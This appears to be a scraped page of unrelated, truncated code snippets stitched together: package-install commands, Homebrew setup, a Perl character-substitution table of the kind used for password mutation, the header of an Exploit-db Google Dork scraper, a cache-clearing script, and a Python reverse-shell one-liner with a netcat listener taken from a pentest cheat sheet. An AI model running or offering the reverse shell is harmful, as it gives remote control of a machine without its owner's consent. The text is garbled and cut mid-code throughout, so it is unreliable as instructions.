Version: 1.9.8
Platform: x86_64
First, install or update to the latest system software.
sudo apt-get update
sudo apt-get install build-essential chrpath libssl-dev libxft-dev
#!/usr/bin/perl | |
use strict; | |
use warnings; | |
my %permution = ( | |
"a" => "a4@&A", | |
"b" => "bB", | |
"c" => "cC", | |
"d" => "dD", |
# XCode Command Line Tools | |
>xcode-select --install | |
# Install Homebrew | |
>ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" | |
>echo PATH=/usr/local/bin:/usr/local/sbin:$PATH >> ~/.bash_profile | |
>source ~/.bash_profile | |
>brew tap homebrew/versions |
#!/usr/bin/python | |
# Exploit-db.com Google Dork Hacking Database Replicator written by Andy Bricker | |
# Proof of concept. You shouldnt use this script without prior consent from Exploit-db.com | |
# http://andybricker.com | |
# Contact: andy at andybricker.com | |
# Requirements | |
# Python 2.7 (Has not been tasted on later versions) | |
# Usage: |
# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
# on the CLIENT, run the following: | |
# nc -l 12345 | |
# on the SERVER, start the "reverse shell" | |
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345 | |
# now go to the CLIENT, listen on port 12345 for incoming shell connections | |
nc -l 12345 |
#!/bin/bash | |
## Bash Script to clear cached memory on (Ubuntu/Debian) Linux | |
## By Philipp Klaus | |
## see <http://blog.philippklaus.de/2011/02/clear-cached-memory-on-ubuntu/> | |
if [ "$(whoami)" != "root" ] | |
then | |
echo "You have to run this script as Superuser!" | |
exit 1 | |
fi |